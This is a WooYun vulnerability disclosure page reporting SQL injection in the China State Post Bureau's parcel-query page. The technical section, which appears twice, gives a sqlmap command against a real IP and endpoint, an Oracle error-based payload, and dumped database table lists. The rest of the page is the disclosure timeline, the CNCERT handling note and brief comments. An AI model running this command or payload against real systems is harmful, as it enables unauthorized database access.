当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053063

漏洞标题:中华人民共和国国家邮政局SQL注射

相关厂商:国家邮政局

漏洞作者: lxj616

提交时间:2014-03-10 17:23

修复时间:2014-04-24 17:24

公开时间:2014-04-24 17:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-10: 细节已通知厂商并且等待厂商处理中
2014-03-15: 厂商已经确认,细节仅向厂商公开
2014-03-25: 细节向核心白帽子及相关领域专家公开
2014-04-04: 细节向普通白帽子公开
2014-04-14: 细节向实习白帽子公开
2014-04-24: 细节向公众公开

简要描述:

中华人民共和国国家邮政局 SQL注射 SQLMAP 验证

详细说明:

http://www.spb.gov.cn/folder9/folder2047/index.html
包裹查询功能

normal01.png


normal02.png


然后SQLMAP试着跑表

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables


sqlmap identified the following injection points with a total of 46 HTTP(s) requests:
---
Place: POST
Parameter: addr1
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+
Database: EXPRESS
[38 tables]
+--------------------------------+
| F_AREAMEM_IN |
| F_AREAMEM_IN_HIS |
| F_AREAMEM_IN_TEM |
| F_AREAMEM_OUT |
| F_AREAMEM_OUT_HIS |
| F_AREAMEM_OUT_TEM |
| F_AREAMEM_OUT__ |
| F_AREA_IN |
| F_AREA_IN_HIS |
| F_AREA_IN_TEM |
| F_AREA_OUT |
| F_AREA_OUT_HIS |
| F_AREA_OUT_TEM |
| F_ARRAY |
| F_ARRAY_HIS |
| F_ARRAY_TEM |
| F_CPY |
| F_PROD |
| LOG_EXPRESS |
| LOG_EXPRESS_STAT |
| LOG_PACKAGE |
| LOG_PACKAGE_STAT |
| LOG_SYS_OPT |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PC2DIST |
| PK_AREAMEM |
| PK_AREAS |
| PK_ARRAY |
| S_CITY |
| S_DIST |
| S_FIELDVALUE |
| S_PROV |
| S_QUERY_TYPE |
| TEST |
+--------------------------------+
Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[30 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$AWCREATE |
| AW$AWCREATE10G |
| AW$AWMD |
| AW$AWREPORT |
| AW$AWXML |
| AW$EXPRESS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPI_HISTORY |
| OLAPI_IFACE_OBJECT_HISTORY |
| OLAPI_IFACE_OP_HISTORY |
| OLAPI_MEMORY_HEAP_HISTORY |
| OLAPI_MEMORY_OP_HISTORY |
| OLAPI_SESSION_HISTORY |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| OLAP_OLEDB_FUNCTIONS_PVT |
| OLAP_OLEDB_KEYWORDS |
| OLAP_OLEDB_MDPROPS |
| OLAP_OLEDB_MDPROPVALS |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+
Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
+--------------------------------+
Database: CTXSYS
[3 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
+--------------------------------+
Database: WMSYS
[4 tables]
+--------------------------------+
| WM$NEXTVER_TABLE |
| WM$VERSION_HIERARCHY_TABLE |
| WM$VERSION_TABLE |
| WM$WORKSPACES_TABLE |
+--------------------------------+

漏洞证明:

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables


sqlmap identified the following injection points with a total of 46 HTTP(s) requests:
---
Place: POST
Parameter: addr1
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+
Database: EXPRESS
[38 tables]
+--------------------------------+
| F_AREAMEM_IN |
| F_AREAMEM_IN_HIS |
| F_AREAMEM_IN_TEM |
| F_AREAMEM_OUT |
| F_AREAMEM_OUT_HIS |
| F_AREAMEM_OUT_TEM |
| F_AREAMEM_OUT__ |
| F_AREA_IN |
| F_AREA_IN_HIS |
| F_AREA_IN_TEM |
| F_AREA_OUT |
| F_AREA_OUT_HIS |
| F_AREA_OUT_TEM |
| F_ARRAY |
| F_ARRAY_HIS |
| F_ARRAY_TEM |
| F_CPY |
| F_PROD |
| LOG_EXPRESS |
| LOG_EXPRESS_STAT |
| LOG_PACKAGE |
| LOG_PACKAGE_STAT |
| LOG_SYS_OPT |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PC2DIST |
| PK_AREAMEM |
| PK_AREAS |
| PK_ARRAY |
| S_CITY |
| S_DIST |
| S_FIELDVALUE |
| S_PROV |
| S_QUERY_TYPE |
| TEST |
+--------------------------------+
Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[30 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$AWCREATE |
| AW$AWCREATE10G |
| AW$AWMD |
| AW$AWREPORT |
| AW$AWXML |
| AW$EXPRESS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPI_HISTORY |
| OLAPI_IFACE_OBJECT_HISTORY |
| OLAPI_IFACE_OP_HISTORY |
| OLAPI_MEMORY_HEAP_HISTORY |
| OLAPI_MEMORY_OP_HISTORY |
| OLAPI_SESSION_HISTORY |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| OLAP_OLEDB_FUNCTIONS_PVT |
| OLAP_OLEDB_KEYWORDS |
| OLAP_OLEDB_MDPROPS |
| OLAP_OLEDB_MDPROPVALS |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+
Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
+--------------------------------+
Database: CTXSYS
[3 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
+--------------------------------+
Database: WMSYS
[4 tables]
+--------------------------------+
| WM$NEXTVER_TABLE |
| WM$VERSION_HIERARCHY_TABLE |
| WM$VERSION_TABLE |
| WM$WORKSPACES_TABLE |
+--------------------------------+

修复方案:

把邮局关掉吧,下线不必要的网站

版权声明:转载请注明来源 lxj616@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-03-15 20:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家某信息安全协调机构上报。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-03-07 21:57 | lck丶 ( 路人 | Rank:6 漏洞数:2 | 求大牛拿0day砸死)

    前排

  2. 2014-03-07 21:59 | 坠落。 ( 路人 | Rank:17 漏洞数:2 | -.- 屌丝一枚,菜鸟一个,擅长windows/linux...)

    mark

  3. 2014-03-07 21:59 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    前排留名

  4. 2014-03-07 22:09 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    mark!我在想国家级别的网站能走大厂商吗?能走那我也有

  5. 2014-03-07 22:12 | 几何黑店 ( 核心白帽子 | Rank:1527 漏洞数:231 | 我要低调点儿.......)

    周末要爆的节奏!!!

  6. 2014-03-10 18:36 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    前排出售avi

  7. 2014-03-10 22:54 | 马云 ( 路人 | Rank:10 漏洞数:5 | 啪啪啪啪啪啪啪啪)

    前排邮箱求种子